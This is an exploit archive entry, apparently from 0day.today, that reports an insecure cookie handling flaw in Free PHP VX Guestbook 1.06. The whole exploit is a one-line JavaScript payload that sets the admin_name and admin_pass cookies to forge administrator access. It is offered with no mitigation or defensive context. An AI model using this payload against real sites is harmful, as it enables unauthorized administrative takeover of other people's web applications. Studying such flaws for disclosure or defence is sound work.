id: 3669
date: 09/13/2008
title: Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

=================================================================
Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability
=================================================================



###############################################################################################
[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
[+] Discovered By Stack                             
################################################################################################
---
exploit:
javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";



#  0day.today [2023-03-23]  #